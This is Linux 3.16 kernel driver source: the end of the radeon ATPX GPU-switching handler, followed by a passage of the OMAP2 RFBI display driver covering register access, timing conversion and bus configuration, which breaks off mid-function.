static int radeon_atpx_switch_end(struct radeon_atpx *atpx, u16 mux_id)
{
struct acpi_buffer params;
union acpi_object *info;
struct atpx_mux input;
if (atpx->functions.switch_end) {
input.size = 4;
input.mux = mux_id;
params.length = input.size;
params.pointer = &input;
info = radeon_atpx_call(atpx->handle,
ATPX_FUNCTION_GRAPHICS_DEVICE_SWITCH_END_NOTIFICATION,
¶ms);
if (!info)
return -EIO;
kfree(info);
}
return 0;
}
/**
* radeon_atpx_switchto - switch to the requested GPU
*
* @id: GPU to switch to
*
* Execute the necessary ATPX functions to switch between the discrete GPU and
* integrated GPU (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_switchto(enum vga_switcheroo_client_id id)
{
u16 gpu_id;
if (id == VGA_SWITCHEROO_IGD)
gpu_id = ATPX_INTEGRATED_GPU;
else
gpu_id = ATPX_DISCRETE_GPU;
radeon_atpx_switch_start(&radeon_atpx_priv.atpx, gpu_id);
radeon_atpx_switch_disp_mux(&radeon_atpx_priv.atpx, gpu_id);
radeon_atpx_switch_i2c_mux(&radeon_atpx_priv.atpx, gpu_id);
radeon_atpx_switch_end(&radeon_atpx_priv.atpx, gpu_id);
return 0;
}
/**
* radeon_atpx_power_state - power down/up the requested GPU
*
* @id: GPU to power down/up
* @state: requested power state (0 = off, 1 = on)
*
* Execute the necessary ATPX function to power down/up the discrete GPU
* (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_power_state(enum vga_switcheroo_client_id id,
enum vga_switcheroo_state state)
{
/* on w500 ACPI can't change intel gpu state */
if (id == VGA_SWITCHEROO_IGD)
return 0;
radeon_atpx_set_discrete_state(&radeon_atpx_priv.atpx, state);
return 0;
}
/**
* radeon_atpx_pci_probe_handle - look up the ATPX handle
*
* @pdev: pci device
*
* Look up the ATPX handles (all asics).
* Returns true if the handles are found, false if not.
*/
static bool radeon_atpx_pci_probe_handle(struct pci_dev *pdev)
{
acpi_handle dhandle, atpx_handle;
acpi_status status;
dhandle = ACPI_HANDLE(&pdev->dev);
if (!dhandle)
return false;
status = acpi_get_handle(dhandle, "ATPX", &atpx_handle);
if (ACPI_FAILURE(status)) {
radeon_atpx_priv.other_handle = dhandle;
return false;
}
radeon_atpx_priv.dhandle = dhandle;
radeon_atpx_priv.atpx.handle = atpx_handle;
return true;
}
/**
* radeon_atpx_init - verify the ATPX interface
*
* Verify the ATPX interface (all asics).
* Returns 0 on success, error on failure.
*/
static int radeon_atpx_init(void)
{
int r;
/* set up the ATPX handle */
r = radeon_atpx_verify_interface(&radeon_atpx_priv.atpx);
if (r)
return r;
/* validate the atpx setup */
r = radeon_atpx_validate(&radeon_atpx_priv.atpx);
if (r)
return r;
return 0;
}
/**
* radeon_atpx_get_client_id - get the client id
*
* @pdev: pci device
*
* look up whether we are the integrated or discrete GPU (all asics).
* Returns the client id.
*/
static int radeon_atpx_get_client_id(struct pci_dev *pdev)
{
if (radeon_atpx_priv.dhandle == ACPI_HANDLE(&pdev->dev))
return VGA_SWITCHEROO_IGD;
else
return VGA_SWITCHEROO_DIS;
}
static struct vga_switcheroo_handler radeon_atpx_handler = {
.switchto = radeon_atpx_switchto,
.power_state = radeon_atpx_power_state,
.init = radeon_atpx_init,
.get_client_id = radeon_atpx_get_client_id,
};
/**
* radeon_atpx_detect - detect whether we have PX
*
* Check if we have a PX system (all asics).
* Returns true if we have a PX system, false if not.
*/
static bool radeon_atpx_detect(void)
{
char acpi_method_name[255] = { 0 };
struct acpi_buffer buffer = {sizeof(acpi_method_name), acpi_method_name};
struct pci_dev *pdev = NULL;
bool has_atpx = false;
int vga_count = 0;
while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, pdev)) != NULL) {
vga_count++;
has_atpx |= (radeon_atpx_pci_probe_handle(pdev) == true);
}
/* some newer PX laptops mark the dGPU as a non-VGA display device */
while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_OTHER << 8, pdev)) != NULL) {
vga_count++;
has_atpx |= (radeon_atpx_pci_probe_handle(pdev) == true);
}
if (has_atpx && vga_count == 2) {
acpi_get_name(radeon_atpx_priv.atpx.handle, ACPI_FULL_PATHNAME, &buffer);
printk(KERN_INFO "VGA switcheroo: detected switching method %s handle\n",
acpi_method_name);
radeon_atpx_priv.atpx_detected = true;
/*
* On some systems hotplug events are generated for the device
* being switched off when ATPX is executed. They cause ACPI
* hotplug to trigger and attempt to remove the device from
* the system, which causes it to break down. Prevent that from
* happening by setting the no_hotplug flag for the involved
* ACPI device objects.
*/
acpi_bus_no_hotplug(radeon_atpx_priv.dhandle);
acpi_bus_no_hotplug(radeon_atpx_priv.other_handle);
return true;
}
return false;
}
/**
* radeon_register_atpx_handler - register with vga_switcheroo
*
* Register the PX callbacks with vga_switcheroo (all asics).
*/
void radeon_register_atpx_handler(void)
{
bool r;
/* detect if we have any ATPX + 2 VGA in the system */
r = radeon_atpx_detect();
if (!r)
return;
vga_switcheroo_register_handler(&radeon_atpx_handler);
}
/**
* radeon_unregister_atpx_handler - unregister with vga_switcheroo
*
* Unregister the PX callbacks with vga_switcheroo (all asics).
*/
void radeon_unregister_atpx_handler(void)
{
vga_switcheroo_unregister_handler();
}
<|start_filename|>linux-3.16/drivers/video/fbdev/omap2/dss/rfbi.c<|end_filename|>
/*
* linux/drivers/video/omap2/dss/rfbi.c
*
* Copyright (C) 2009 Nokia Corporation
* Author: <NAME> <<EMAIL>>
*
* Some code and ideas taken from drivers/video/omap/ driver
* by <NAME>.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published by
* the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program. If not, see <http://www.gnu.org/licenses/>.
*/
#define DSS_SUBSYS_NAME "RFBI"
#include <linux/kernel.h>
#include <linux/dma-mapping.h>
#include <linux/export.h>
#include <linux/vmalloc.h>
#include <linux/clk.h>
#include <linux/io.h>
#include <linux/delay.h>
#include <linux/kfifo.h>
#include <linux/ktime.h>
#include <linux/hrtimer.h>
#include <linux/seq_file.h>
#include <linux/semaphore.h>
#include <linux/platform_device.h>
#include <linux/pm_runtime.h>
#include <video/omapdss.h>
#include "dss.h"
struct rfbi_reg { u16 idx; };
#define RFBI_REG(idx) ((const struct rfbi_reg) { idx })
#define RFBI_REVISION RFBI_REG(0x0000)
#define RFBI_SYSCONFIG RFBI_REG(0x0010)
#define RFBI_SYSSTATUS RFBI_REG(0x0014)
#define RFBI_CONTROL RFBI_REG(0x0040)
#define RFBI_PIXEL_CNT RFBI_REG(0x0044)
#define RFBI_LINE_NUMBER RFBI_REG(0x0048)
#define RFBI_CMD RFBI_REG(0x004c)
#define RFBI_PARAM RFBI_REG(0x0050)
#define RFBI_DATA RFBI_REG(0x0054)
#define RFBI_READ RFBI_REG(0x0058)
#define RFBI_STATUS RFBI_REG(0x005c)
#define RFBI_CONFIG(n) RFBI_REG(0x0060 + (n)*0x18)
#define RFBI_ONOFF_TIME(n) RFBI_REG(0x0064 + (n)*0x18)
#define RFBI_CYCLE_TIME(n) RFBI_REG(0x0068 + (n)*0x18)
#define RFBI_DATA_CYCLE1(n) RFBI_REG(0x006c + (n)*0x18)
#define RFBI_DATA_CYCLE2(n) RFBI_REG(0x0070 + (n)*0x18)
#define RFBI_DATA_CYCLE3(n) RFBI_REG(0x0074 + (n)*0x18)
#define RFBI_VSYNC_WIDTH RFBI_REG(0x0090)
#define RFBI_HSYNC_WIDTH RFBI_REG(0x0094)
#define REG_FLD_MOD(idx, val, start, end) \
rfbi_write_reg(idx, FLD_MOD(rfbi_read_reg(idx), val, start, end))
enum omap_rfbi_cycleformat {
OMAP_DSS_RFBI_CYCLEFORMAT_1_1 = 0,
OMAP_DSS_RFBI_CYCLEFORMAT_2_1 = 1,
OMAP_DSS_RFBI_CYCLEFORMAT_3_1 = 2,
OMAP_DSS_RFBI_CYCLEFORMAT_3_2 = 3,
};
enum omap_rfbi_datatype {
OMAP_DSS_RFBI_DATATYPE_12 = 0,
OMAP_DSS_RFBI_DATATYPE_16 = 1,
OMAP_DSS_RFBI_DATATYPE_18 = 2,
OMAP_DSS_RFBI_DATATYPE_24 = 3,
};
enum omap_rfbi_parallelmode {
OMAP_DSS_RFBI_PARALLELMODE_8 = 0,
OMAP_DSS_RFBI_PARALLELMODE_9 = 1,
OMAP_DSS_RFBI_PARALLELMODE_12 = 2,
OMAP_DSS_RFBI_PARALLELMODE_16 = 3,
};
static int rfbi_convert_timings(struct rfbi_timings *t);
static void rfbi_get_clk_info(u32 *clk_period, u32 *max_clk_div);
static struct {
struct platform_device *pdev;
void __iomem *base;
unsigned long l4_khz;
enum omap_rfbi_datatype datatype;
enum omap_rfbi_parallelmode parallelmode;
enum omap_rfbi_te_mode te_mode;
int te_enabled;
void (*framedone_callback)(void *data);
void *framedone_callback_data;
struct omap_dss_device *dssdev[2];
struct semaphore bus_lock;
struct omap_video_timings timings;
int pixel_size;
int data_lines;
struct rfbi_timings intf_timings;
struct omap_dss_device output;
} rfbi;
static inline void rfbi_write_reg(const struct rfbi_reg idx, u32 val)
{
__raw_writel(val, rfbi.base + idx.idx);
}
static inline u32 rfbi_read_reg(const struct rfbi_reg idx)
{
return __raw_readl(rfbi.base + idx.idx);
}
static int rfbi_runtime_get(void)
{
int r;
DSSDBG("rfbi_runtime_get\n");
r = pm_runtime_get_sync(&rfbi.pdev->dev);
WARN_ON(r < 0);
return r < 0 ? r : 0;
}
static void rfbi_runtime_put(void)
{
int r;
DSSDBG("rfbi_runtime_put\n");
r = pm_runtime_put_sync(&rfbi.pdev->dev);
WARN_ON(r < 0 && r != -ENOSYS);
}
static void rfbi_bus_lock(void)
{
down(&rfbi.bus_lock);
}
static void rfbi_bus_unlock(void)
{
up(&rfbi.bus_lock);
}
static void rfbi_write_command(const void *buf, u32 len)
{
switch (rfbi.parallelmode) {
case OMAP_DSS_RFBI_PARALLELMODE_8:
{
const u8 *b = buf;
for (; len; len--)
rfbi_write_reg(RFBI_CMD, *b++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_16:
{
const u16 *w = buf;
BUG_ON(len & 1);
for (; len; len -= 2)
rfbi_write_reg(RFBI_CMD, *w++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_9:
case OMAP_DSS_RFBI_PARALLELMODE_12:
default:
BUG();
}
}
static void rfbi_read_data(void *buf, u32 len)
{
switch (rfbi.parallelmode) {
case OMAP_DSS_RFBI_PARALLELMODE_8:
{
u8 *b = buf;
for (; len; len--) {
rfbi_write_reg(RFBI_READ, 0);
*b++ = rfbi_read_reg(RFBI_READ);
}
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_16:
{
u16 *w = buf;
BUG_ON(len & ~1);
for (; len; len -= 2) {
rfbi_write_reg(RFBI_READ, 0);
*w++ = rfbi_read_reg(RFBI_READ);
}
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_9:
case OMAP_DSS_RFBI_PARALLELMODE_12:
default:
BUG();
}
}
static void rfbi_write_data(const void *buf, u32 len)
{
switch (rfbi.parallelmode) {
case OMAP_DSS_RFBI_PARALLELMODE_8:
{
const u8 *b = buf;
for (; len; len--)
rfbi_write_reg(RFBI_PARAM, *b++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_16:
{
const u16 *w = buf;
BUG_ON(len & 1);
for (; len; len -= 2)
rfbi_write_reg(RFBI_PARAM, *w++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_9:
case OMAP_DSS_RFBI_PARALLELMODE_12:
default:
BUG();
}
}
static void rfbi_write_pixels(const void __iomem *buf, int scr_width,
u16 x, u16 y,
u16 w, u16 h)
{
int start_offset = scr_width * y + x;
int horiz_offset = scr_width - w;
int i;
if (rfbi.datatype == OMAP_DSS_RFBI_DATATYPE_16 &&
rfbi.parallelmode == OMAP_DSS_RFBI_PARALLELMODE_8) {
const u16 __iomem *pd = buf;
pd += start_offset;
for (; h; --h) {
for (i = 0; i < w; ++i) {
const u8 __iomem *b = (const u8 __iomem *)pd;
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+1));
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+0));
++pd;
}
pd += horiz_offset;
}
} else if (rfbi.datatype == OMAP_DSS_RFBI_DATATYPE_24 &&
rfbi.parallelmode == OMAP_DSS_RFBI_PARALLELMODE_8) {
const u32 __iomem *pd = buf;
pd += start_offset;
for (; h; --h) {
for (i = 0; i < w; ++i) {
const u8 __iomem *b = (const u8 __iomem *)pd;
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+2));
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+1));
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+0));
++pd;
}
pd += horiz_offset;
}
} else if (rfbi.datatype == OMAP_DSS_RFBI_DATATYPE_16 &&
rfbi.parallelmode == OMAP_DSS_RFBI_PARALLELMODE_16) {
const u16 __iomem *pd = buf;
pd += start_offset;
for (; h; --h) {
for (i = 0; i < w; ++i) {
rfbi_write_reg(RFBI_PARAM, __raw_readw(pd));
++pd;
}
pd += horiz_offset;
}
} else {
BUG();
}
}
static int rfbi_transfer_area(struct omap_dss_device *dssdev,
void (*callback)(void *data), void *data)
{
u32 l;
int r;
struct omap_overlay_manager *mgr = rfbi.output.manager;
u16 width = rfbi.timings.x_res;
u16 height = rfbi.timings.y_res;
/*BUG_ON(callback == 0);*/
BUG_ON(rfbi.framedone_callback != NULL);
DSSDBG("rfbi_transfer_area %dx%d\n", width, height);
dss_mgr_set_timings(mgr, &rfbi.timings);
r = dss_mgr_enable(mgr);
if (r)
return r;
rfbi.framedone_callback = callback;
rfbi.framedone_callback_data = data;
rfbi_write_reg(RFBI_PIXEL_CNT, width * height);
l = rfbi_read_reg(RFBI_CONTROL);
l = FLD_MOD(l, 1, 0, 0); /* enable */
if (!rfbi.te_enabled)
l = FLD_MOD(l, 1, 4, 4); /* ITE */
rfbi_write_reg(RFBI_CONTROL, l);
return 0;
}
static void framedone_callback(void *data)
{
void (*callback)(void *data);
DSSDBG("FRAMEDONE\n");
REG_FLD_MOD(RFBI_CONTROL, 0, 0, 0);
callback = rfbi.framedone_callback;
rfbi.framedone_callback = NULL;
if (callback != NULL)
callback(rfbi.framedone_callback_data);
}
#if 1 /* VERBOSE */
static void rfbi_print_timings(void)
{
u32 l;
u32 time;
l = rfbi_read_reg(RFBI_CONFIG(0));
time = 1000000000 / rfbi.l4_khz;
if (l & (1 << 4))
time *= 2;
DSSDBG("Tick time %u ps\n", time);
l = rfbi_read_reg(RFBI_ONOFF_TIME(0));
DSSDBG("CSONTIME %d, CSOFFTIME %d, WEONTIME %d, WEOFFTIME %d, "
"REONTIME %d, REOFFTIME %d\n",
l & 0x0f, (l >> 4) & 0x3f, (l >> 10) & 0x0f, (l >> 14) & 0x3f,
(l >> 20) & 0x0f, (l >> 24) & 0x3f);
l = rfbi_read_reg(RFBI_CYCLE_TIME(0));
DSSDBG("WECYCLETIME %d, RECYCLETIME %d, CSPULSEWIDTH %d, "
"ACCESSTIME %d\n",
(l & 0x3f), (l >> 6) & 0x3f, (l >> 12) & 0x3f,
(l >> 22) & 0x3f);
}
#else
static void rfbi_print_timings(void) {}
#endif
static u32 extif_clk_period;
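/*
 * Round a delay given in picoseconds up to a whole number of external
 * interface clock ticks (extif_clk_period * div picoseconds each).  As an
 * illustration only: assuming a hypothetical 100 MHz L4 clock the tick is
 * 10000 ps, so with div = 1 a 25000 ps delay rounds up to 30000 ps
 * (three ticks).
 */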
static inline unsigned long round_to_extif_ticks(unsigned long ps, int div)
{
int bus_tick = extif_clk_period * div;
return (ps + bus_tick - 1) / bus_tick * bus_tick;
}
static int calc_reg_timing(struct rfbi_timings *t, int div)
{
t->clk_div = div;
t->cs_on_time = round_to_extif_ticks(t->cs_on_time, div);
t->we_on_time = round_to_extif_ticks(t->we_on_time, div);
t->we_off_time = round_to_extif_ticks(t->we_off_time, div);
t->we_cycle_time = round_to_extif_ticks(t->we_cycle_time, div);
t->re_on_time = round_to_extif_ticks(t->re_on_time, div);
t->re_off_time = round_to_extif_ticks(t->re_off_time, div);
t->re_cycle_time = round_to_extif_ticks(t->re_cycle_time, div);
t->access_time = round_to_extif_ticks(t->access_time, div);
t->cs_off_time = round_to_extif_ticks(t->cs_off_time, div);
t->cs_pulse_width = round_to_extif_ticks(t->cs_pulse_width, div);
DSSDBG("[reg]cson %d csoff %d reon %d reoff %d\n",
t->cs_on_time, t->cs_off_time, t->re_on_time, t->re_off_time);
DSSDBG("[reg]weon %d weoff %d recyc %d wecyc %d\n",
t->we_on_time, t->we_off_time, t->re_cycle_time,
t->we_cycle_time);
DSSDBG("[reg]rdaccess %d cspulse %d\n",
t->access_time, t->cs_pulse_width);
return rfbi_convert_timings(t);
}
static int calc_extif_timings(struct rfbi_timings *t)
{
u32 max_clk_div;
int div;
rfbi_get_clk_info(&extif_clk_period, &max_clk_div);
for (div = 1; div <= max_clk_div; div++) {
if (calc_reg_timing(t, div) == 0)
break;
}
if (div <= max_clk_div)
return 0;
DSSERR("can't setup timings\n");
return -1;
}
static void rfbi_set_timings(int rfbi_module, struct rfbi_timings *t)
{
int r;
if (!t->converted) {
r = calc_extif_timings(t);
if (r < 0)
DSSERR("Failed to calc timings\n");
}
BUG_ON(!t->converted);
rfbi_write_reg(RFBI_ONOFF_TIME(rfbi_module), t->tim[0]);
rfbi_write_reg(RFBI_CYCLE_TIME(rfbi_module), t->tim[1]);
/* TIMEGRANULARITY */
REG_FLD_MOD(RFBI_CONFIG(rfbi_module),
(t->tim[2] ? 1 : 0), 4, 4);
rfbi_print_timings();
}
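/*
 * Convert a time in picoseconds into RFBI functional clock ticks for the
 * given clock divider, rounding up.  The tick length is derived from the
 * L4 interface clock rate (rfbi.l4_khz).
 */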
static int ps_to_rfbi_ticks(int time, int div)
{
unsigned long tick_ps;
int ret;
/* Calculate in picosecs to yield more exact results */
tick_ps = 1000000000 / (rfbi.l4_khz) * div;
ret = (time + tick_ps - 1) / tick_ps;
return ret;
}
static void rfbi_get_clk_info(u32 *clk_period, u32 *max_clk_div)
{
*clk_period = 1000000000 / rfbi.l4_khz;
*max_clk_div = 2;
}
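/*
 * Convert the picosecond timings in *t into the packed register values
 * used for RFBI_ONOFF_TIME (tim[0]) and RFBI_CYCLE_TIME (tim[1]), plus the
 * TIMEGRANULARITY selector (tim[2]).  Returns -1 if any field overflows
 * its bitfield with the requested clock divider, 0 on success with
 * t->converted set.
 */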
static int rfbi_convert_timings(struct rfbi_timings *t)
{
u32 l;
int reon, reoff, weon, weoff, cson, csoff, cs_pulse;
int actim, recyc, wecyc;
int div = t->clk_div;
if (div <= 0 || div > 2)
return -1;
/* Make sure that after conversion it still holds that:
* weoff > weon, reoff > reon, recyc >= reoff, wecyc >= weoff,
* csoff > cson, csoff >= max(weoff, reoff), actim > reon
*/
weon = ps_to_rfbi_ticks(t->we_on_time, div);
weoff = ps_to_rfbi_ticks(t->we_off_time, div);
if (weoff <= weon)
weoff = weon + 1;
if (weon > 0x0f)
return -1;
if (weoff > 0x3f)
return -1;
reon = ps_to_rfbi_ticks(t->re_on_time, div);
reoff = ps_to_rfbi_ticks(t->re_off_time, div);
if (reoff <= reon)
reoff = reon + 1;
if (reon > 0x0f)
return -1;
if (reoff > 0x3f)
return -1;
cson = ps_to_rfbi_ticks(t->cs_on_time, div);
csoff = ps_to_rfbi_ticks(t->cs_off_time, div);
if (csoff <= cson)
csoff = cson + 1;
if (csoff < max(weoff, reoff))
csoff = max(weoff, reoff);
if (cson > 0x0f)
return -1;
if (csoff > 0x3f)
return -1;
l = cson;
l |= csoff << 4;
l |= weon << 10;
l |= weoff << 14;
l |= reon << 20;
l |= reoff << 24;
t->tim[0] = l;
actim = ps_to_rfbi_ticks(t->access_time, div);
if (actim <= reon)
actim = reon + 1;
if (actim > 0x3f)
return -1;
wecyc = ps_to_rfbi_ticks(t->we_cycle_time, div);
if (wecyc < weoff)
wecyc = weoff;
if (wecyc > 0x3f)
return -1;
recyc = ps_to_rfbi_ticks(t->re_cycle_time, div);
if (recyc < reoff)
recyc = reoff;
if (recyc > 0x3f)
return -1;
cs_pulse = ps_to_rfbi_ticks(t->cs_pulse_width, div);
if (cs_pulse > 0x3f)
return -1;
l = wecyc;
l |= recyc << 6;
l |= cs_pulse << 12;
l |= actim << 22;
t->tim[1] = l;
t->tim[2] = div - 1;
t->converted = 1;
return 0;
}
/* xxx FIX module selection missing */
static int rfbi_setup_te(enum omap_rfbi_te_mode mode,
unsigned hs_pulse_time, unsigned vs_pulse_time,
int hs_pol_inv, int vs_pol_inv, int extif_div)
{
int hs, vs;
int min;
u32 l;
hs = ps_to_rfbi_ticks(hs_pulse_time, 1);
vs = ps_to_rfbi_ticks(vs_pulse_time, 1);
if (hs < 2)
return -EDOM;
if (mode == OMAP_DSS_RFBI_TE_MODE_2)
min = 2;
else /* OMAP_DSS_RFBI_TE_MODE_1 */
min = 4;
if (vs < min)
return -EDOM;
if (vs == hs)
return -EINVAL;
rfbi.te_mode = mode;
DSSDBG("setup_te: mode %d hs %d vs %d hs_inv %d vs_inv %d\n",
mode, hs, vs, hs_pol_inv, vs_pol_inv);
rfbi_write_reg(RFBI_HSYNC_WIDTH, hs);
rfbi_write_reg(RFBI_VSYNC_WIDTH, vs);
l = rfbi_read_reg(RFBI_CONFIG(0));
if (hs_pol_inv)
l &= ~(1 << 21);
else
l |= 1 << 21;
	if (vs_pol_inv)
		l &= ~(1 << 20);
	else
		l |= 1 << 20;
	rfbi_write_reg(RFBI_CONFIG(0), l);
	return 0;
}
/* xxx FIX module selection missing */
static int rfbi_enable_te(bool enable, unsigned line)
{
u32 l;
DSSDBG("te %d line %d mode %d\n", enable, line, rfbi.te_mode);
if (line > (1 << 11) - 1)
return -EINVAL;
l = rfbi_read_reg(RFBI_CONFIG(0));
l &= ~(0x3 << 2);
if (enable) {
rfbi.te_enabled = 1;
l |= rfbi.te_mode << 2;
} else
rfbi.te_enabled = 0;
rfbi_write_reg(RFBI_CONFIG(0), l);
rfbi_write_reg(RFBI_LINE_NUMBER, line);
return 0;
}
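/*
 * Program RFBI_CONFIG and the DATA_CYCLE registers for a given pixel
 * depth (bpp) and bus width (lines).  The cycle format follows from the
 * ratio of the two: for example 16 bpp on an 8-bit bus needs two bus
 * cycles per pixel (CYCLEFORMAT_2_1), while 12 bpp on an 8-bit bus needs
 * three cycles per two pixels (CYCLEFORMAT_3_2).  Unsupported
 * combinations hit BUG() and return 1.
 */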
static int rfbi_configure_bus(int rfbi_module, int bpp, int lines)
{
u32 l;
int cycle1 = 0, cycle2 = 0, cycle3 = 0;
enum omap_rfbi_cycleformat cycleformat;
enum omap_rfbi_datatype datatype;
enum omap_rfbi_parallelmode parallelmode;
switch (bpp) {
case 12:
datatype = OMAP_DSS_RFBI_DATATYPE_12;
break;
case 16:
datatype = OMAP_DSS_RFBI_DATATYPE_16;
break;
case 18:
datatype = OMAP_DSS_RFBI_DATATYPE_18;
break;
case 24:
datatype = OMAP_DSS_RFBI_DATATYPE_24;
break;
default:
BUG();
return 1;
}
rfbi.datatype = datatype;
switch (lines) {
case 8:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_8;
break;
case 9:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_9;
break;
case 12:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_12;
break;
case 16:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_16;
break;
default:
BUG();
return 1;
}
rfbi.parallelmode = parallelmode;
if ((bpp % lines) == 0) {
switch (bpp / lines) {
case 1:
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_1_1;
break;
case 2:
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_2_1;
break;
case 3:
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_3_1;
break;
default:
BUG();
return 1;
}
} else if ((2 * bpp % lines) == 0) {
if ((2 * bpp / lines) == 3)
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_3_2;
else {
BUG();
return 1;
}
} else {
BUG();
return 1;
}
switch (cycleformat) {
case OMAP_DSS_RFBI_CYCLEFORMAT_1_1:
cycle1 = lines;
break;
case OMAP_DSS_RFBI_CYCLEFORMAT_2_1:
cycle1 = lines;
cycle2 = lines;
break;
case OMAP_DSS_RFBI_CYCLEFORMAT_3_1:
cycle1 = lines;
cycle2 = lines;
cycle3 = lines;
break;
case OMAP_DSS_RFBI_CYCLEFORMAT_3_2:
cycle1 = lines;
cycle2 = (lines / 2) | ((lines / 2) << 16);
cycle3 = (lines << 16);
break;
}
REG_FLD_MOD(RFBI_CONTROL, 0, 3, 2); /* clear CS */
l = 0;
l |= FLD_VAL(parallelmode, 1, 0);
l |= FLD_VAL(0, 3, 2); /* TRIGGERMODE: ITE */
l |= FLD_VAL(0, 4, 4); /* TIMEGRANULARITY */
l |= FLD_VAL(datatype, 6, 5);
/* l |= FLD_VAL(2, 8, 7); */ /* L4FORMAT, 2pix/L4 */
l |= FLD_VAL(0, 8, 7); /* L4FORMAT, 1pix/L4 */
l |= FLD_VAL(cycleformat, 10, 9);
l |= FLD_VAL(0, 12, 11); /* UNUSEDBITS */
l |= FLD_VAL(0, 16, 16); /* A0POLARITY */
l |= FLD_VAL(0, 17, 17); /* REPOLARITY */
l |= FLD_VAL(0, 18, 18); /* WEPOLARITY */
l |= FLD_VAL(0, 19, 19); /* CSPOLARITY */
l |= FLD_VAL(1, 20, 20); /* TE_VSYNC_POLARITY */
l |= FLD_VAL(1, 21, 21); /* HSYNCPOLARITY */
rfbi_write_reg(RFBI_CONFIG(rfbi_module), l);
rfbi_write_reg(RFBI_DATA_CYCLE1(rfbi_module), cycle1);
rfbi_write_reg(RFBI_DATA_CYCLE2(rfbi_module), cycle2);
rfbi_write_reg(RFBI_DATA_CYCLE3(rfbi_module), cycle3);
l = rfbi_read_reg(RFBI_CONTROL);
l = FLD_MOD(l, rfbi_module+1, 3, 2); /* Select CSx */
l = FLD_MOD(l, 0, 1, 1); /* clear bypass */
rfbi_write_reg(RFBI_CONTROL, l);
DSSDBG("RFBI config: bpp %d, lines %d, cycles: 0x%x 0x%x 0x%x\n",
bpp, lines, cycle1, cycle2, cycle3);
return 0;
}
static int rfbi_configure(struct omap_dss_device *dssdev)
{
return rfbi_configure_bus(dssdev->phy.rfbi.channel, rfbi.pixel_size,
rfbi.data_lines);
}
static int rfbi_update(struct omap_dss_device *dssdev, void (*callback)(void *),
void *data)
{
return rfbi_transfer_area(dssdev, callback, data);
}
static void rfbi_set_size(struct omap_dss_device *dssdev, u16 w, u16 h)
{
rfbi.timings.x_res = w;
rfbi.timings.y_res = h;
}
static void rfbi_set_pixel_size(struct omap_dss_device *dssdev, int pixel_size)
{
rfbi.pixel_size = pixel_size;
}
static void rfbi_set_data_lines(struct omap_dss_device *dssdev, int data_lines)
{
rfbi.data_lines = data_lines;
}
static void rfbi_set_interface_timings(struct omap_dss_device *dssdev,
struct rfbi_timings *timings)
{
rfbi.intf_timings = *timings;
}
static void rfbi_dump_regs(struct seq_file *s)
{
#define DUMPREG(r) seq_printf(s, "%-35s %08x\n", #r, rfbi_read_reg(r))
if (rfbi_runtime_get())
return;
DUMPREG(RFBI_REVISION);
DUMPREG(RFBI_SYSCONFIG);
DUMPREG(RFBI_SYSSTATUS);
DUMPREG(RFBI_CONTROL);
DUMPREG(RFBI_PIXEL_CNT);
DUMPREG(RFBI_LINE_NUMBER);
DUMPREG(RFBI_CMD);
DUMPREG(RFBI_PARAM);
DUMPREG(RFBI_DATA);
DUMPREG(RFBI_READ);
DUMPREG(RFBI_STATUS);
DUMPREG(RFBI_CONFIG(0));
DUMPREG(RFBI_ONOFF_TIME(0));
DUMPREG(RFBI_CYCLE_TIME(0));
DUMPREG(RFBI_DATA_CYCLE1(0));
DUMPREG(RFBI_DATA_CYCLE2(0));
DUMPREG(RFBI_DATA_CYCLE3(0));
DUMPREG(RFBI_CONFIG(1));
DUMPREG(RFBI_ONOFF_TIME(1));
DUMPREG(RFBI_CYCLE_TIME(1));
DUMPREG(RFBI_DATA_CYCLE1(1));
DUMPREG(RFBI_DATA_CYCLE2(1));
DUMPREG(RFBI_DATA_CYCLE3(1));
DUMPREG(RFBI_VSYNC_WIDTH);
DUMPREG(RFBI_HSYNC_WIDTH);
rfbi_runtime_put();
#undef DUMPREG
}
static void rfbi_config_lcd_manager(struct omap_dss_device *dssdev)
{
struct omap_overlay_manager *mgr = rfbi.output.manager;
struct dss_lcd_mgr_config mgr_config;
mgr_config.io_pad_mode = DSS_IO_PAD_MODE_RFBI;
mgr_config.stallmode = true;
/* Do we need fifohandcheck for RFBI? */
mgr_config.fifohandcheck = false;
mgr_config.video_port_width = rfbi.pixel_size;
mgr_config.lcden_sig_polarity = 0;
dss_mgr_set_lcd_config(mgr, &mgr_config);
/*
* Set rfbi.timings with default values, the x_res and y_res fields
* are expected to be already configured by the panel driver via
* omapdss_rfbi_set_size()
*/
rfbi.timings.hsw = 1;
rfbi.timings.hfp = 1;
rfbi.timings.hbp = 1;
rfbi.timings.vsw = 1;
rfbi.timings.vfp = 0;
rfbi.timings.vbp = 0;
rfbi.timings.interlace = false;
rfbi.timings.hsync_level = OMAPDSS_SIG_ACTIVE_HIGH;
rfbi.timings.vsync_level = OMAPDSS_SIG_ACTIVE_HIGH;
rfbi.timings.data_pclk_edge = OMAPDSS_DRIVE_SIG_RISING_EDGE;
rfbi.timings.de_level = OMAPDSS_SIG_ACTIVE_HIGH;
